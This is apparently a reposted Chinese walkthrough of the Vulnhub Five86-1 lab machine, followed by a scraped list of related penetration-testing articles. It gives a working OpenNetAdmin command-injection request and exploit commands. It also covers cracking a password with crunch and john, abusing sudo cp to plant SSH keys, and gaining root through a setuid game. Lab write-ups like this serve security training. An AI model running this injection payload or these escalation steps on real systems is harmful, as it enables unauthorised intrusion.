Vulnhub-Five86-1

实验环境

kali攻击机ip:192.168.56.116

Five86-1靶机ip:192.168.56.121

知识点及工具

nmap扫描

john爆破

OpenNetAdmin RCE

开始渗透

首先第一步对目标靶机网络

nmap -A –p- 192.168.56.121

扫描发现一个80web端口和一个22ssh端口和10000webmin端口。

Web浏览 http://192.168.56.121,页面啥都没有空白一片

使用dirb工具对目录进行扫描,或者namp扫描也有提示robots.txt和/ona目录

访问/ona

http://192.168.56.121/ona

发现是opennetadmin,exploit-db搜索找到两个poc一个msf的一个sh

先拿sh的文件验证一下,抓取登录包,修改请求方式为post,body添加以下代码

xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping
发现可利用,执行成功了

脚本运行一下

./exp.sh http://192.168.56.121/ona/login.php

或者利用msf的也行,把它复制到/usr/share/metasploit-framework/modules/exploits目录下,然后重新加载msf(命令reload_all)。

set rhosts 192.168.56.121
set lhost 192.168.56.116
exploit

在此发现限制了其他目录访问,可ls,cat 等命令

然后查找一下www-data能够访问的东西

find / -type f -user www-data
在前面两个可以看到能够读取.htaccess文件
cat /var/www/html/reports/.htaccess

看到了douglas账号密码,然后提示aefhrt组合的10个字符

接下来生成密码

crunch 10 10 aefhrt > password.txt
爆破密码
john --wordlist=password.txt douglas
爆破出来得到密码
douglas:fatherrrrr

ssh登录

ssh douglas@192.168.56.121

找了一番 然后sudo –l 发现可cp,然后进行下一步

生成一个jen的ssh密钥吧,看见douglas下存在.ssh,也给jen生成一个

ssh-keygen –t rsa –C “jen@five86-1”
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

这个就利用了cp命令

切换一个身份

ssh jen@127.0.0.1

登录成功了

登录之后我看见了最后一行提示了你有一封新邮件,然后查看,发现了moss的账号密码

cd  /var/maills
cat jen

得到账号密码

moss:Fire!Fire!

再次切换为moss用户

su moss

在moss目录下发现一个.games目录下upyougame运行可root身份

随便你怎么输入只要输入个字符,然后完了就是#(root)号了

转载自 :https://mp.weixin.qq.com/s?__biz=MzAwMjgwMTU1Mg==&mid=2247484162&idx=1&sn=d0d7b65b7167e910cd48c2055b436b4c&chksm=9ac5a9fdadb220eb5d778be6403bb9f5c8595e6d7208979c644f5e6d16ae2f8e32c40560673a&mpshare=1&scene=23&srcid=&sharer_sharetime=1579925317576&sharer_shareid=1979c40cd73d328af307e7b01238782f#rd

 
 

five86-1 (OpenNetadmin RCE+cp命令提权+crunch生成密码字典)的更多相关文章

  1. Linux提权(持续更新)

    利用/etc/passwd提权 个人认为,这种提权方式在现实场景中难以实现,条件太过苛刻,但是建立Linux下的隐藏账户是个不错的选择,灵感来自:https://www.hackingarticles ...

  2. adore-ng笔记和Linux普通用户提权

    官网:https://github.com/trimpsyw/adore-ng 安装: [root@xuegod63 ~]# unzipadore-ng-master.zip [root@xuegod ...

  3. WIN提权总结【本地存档-转载】

    [ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1 ...

  4. Meterpreter提权详解

      0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpr ...

  5. 暴破助攻提权:ruadmin

    i春秋作家:yangyangwithgnu 1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路 ...

  6. 35.windows提权总结

    本文参考自冷逸大佬的博客,源地址在这里:https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/ windows提 ...

  7. [转载]SQL Server提权系列

    本文原文地址:https://www.cnblogs.com/wintrysec/p/10875232.html 一.利用xp_cmdshell提权 xp_cmdshell默认是关闭的,可以通过下面的 ...

  8. sudo提权,ansible批量给所有主机创建系统账户,授权

    sudo(superuser or another do)让普通用户可以以超级管理员或其他人的身份执行命令. sudo基本流程如下: 1.管理员需要先授权(修改/etc/sudoers文件) 2.普通 ...

  9. MS14-068域提权漏洞复现

    MS14-068域提权漏洞复现 一.漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限. 微软官方解释: https://docs.microsoft.com/zh-cn ...

随机推荐

  1. Linux 安装分区设置分区大小

    一.Linux分区挂载点介绍 Linux分区挂载点介绍,推荐容量仅供参考不是绝对,跟各系统用途以及硬盘空间配额等因素实际调整: 分区类型 介绍 备注 /boot 启动分区 一般设置100M-200M, ...

  2. file转化为binary对象发送给后台

    具体代码如下: function filechange(e) { var file = $('#filed').get(0).files[0]; var fileSize = file.size, f ...

  3. JVM(二)类加载的时机及其过程

    类从被加载到虚拟机内存中开始,到卸载出内存为止,它的的整个生命周期包括: 加载(Loading),验证(Verification),准备(Preparation),解析(Resolution),初始化 ...

  4. PB 级大规模 Elasticsearch 集群运维与调优实践

    PB 级大规模 Elasticsearch 集群运维与调优实践 https://mp.weixin.qq.com/s/PDyHT9IuRij20JBgbPTjFA | 导语 腾讯云 Elasticse ...

  5. 排查golang的性能问题 go pprof 实践

    小结: 1.内存消耗分析 list peek  定位到函数   https://mp.weixin.qq.com/s/_LovnIqJYAuDpTm2QmUgrA 使用pprof和go-torch排查 ...

  6. Jenkins部署springboot项目

    记录jenkins如何部署springboot项目(jar类型的) 一.首先需要先配置好jenkins的基本配置(jdk.maven--),可在系统管理-->>全局工具配置中进行配置. 配 ...

  7. Python 2.x 和 Python 3.x

    Python 2.x 默认不支持中文,具体原因,等到介绍 字符编码 时给大家讲解 Python 2.x 的解释器名称是 python Python 3.x 的解释器名称是 python3 目前市场上有 ...

  8. Webpack4.0各个击破(1)html篇

    webpack作为前端最火的构建工具,是前端自动化工具链最重要的部分,使用门槛较高.本系列是笔者自己的学习记录,比较基础,希望通过问题 + 解决方式的模式,以前端构建中遇到的具体需求为出发点,学习we ...

  9. 强连通分量 与 2-SAT

    近期一直在刷这方面的题 因为没法学新知识 但又想写点什么 就水篇博文吧 引理 简单来说,在一个有向图中,若所有点之间两两互相直接可达,则将这个图成为强连通分量 强连通分量可以是某个有向图中的子图 求强 ...

  10. CF912A

    题意 你手里有 A 个黄水晶和 B 个蓝水晶,其中两个黄水晶可以造一个黄水晶球,三个蓝水晶可以造一个蓝水晶球,一黄一蓝两个水晶可以造一个绿水晶球. 现在你需要 x 个黄水晶球,y 个绿水晶球,z 个蓝 ...